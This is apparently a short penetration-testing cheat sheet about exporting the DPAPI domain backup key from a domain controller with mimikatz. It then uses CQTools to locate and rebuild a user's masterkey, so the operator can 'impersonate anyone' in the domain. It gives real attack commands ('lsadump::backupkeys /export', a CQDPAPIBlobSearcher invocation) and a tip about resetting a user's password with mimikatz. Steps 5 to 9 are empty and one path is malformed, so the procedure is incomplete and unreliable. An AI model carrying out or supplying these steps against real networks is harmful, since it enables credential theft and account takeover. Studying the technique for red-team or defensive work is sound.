DPAPI Domain Backup Key
Exporting DPAPI Domain Backup Key from a domain controller with mimikatz, and explaining how to recreate a user's masterkey (AKA Impersonate ANYONE within the domain)
Requirements: System level access on the host
Steps:
1)
mimikatz.exe 2) Dump the DPAPI Domain Backup Key from DC
lsadump::backupkeys /system:localhost /export 3) Transfer the .pfx container, as well as some of the CQtools (CQDPAPIBlobSearcher.exe and CQMasterKeyAD.exe to target machine of your choice)
4) Finds the Masterkey, which shown as mkguid on results
CQDPAPIBlobSearcher.exe /d c:\users\USER\AppData\Roaming /r /o c:users\USER\Desktop\blob 5) Attacking machine:
6) Attacking machine: (Use cqure as passphrase. We repacked the pfx using "cqure" as passphrase to make the cqtool work or else it will fail)
7)
8)
9)
10) Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one
11) VOILA!
TIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz:
Last updated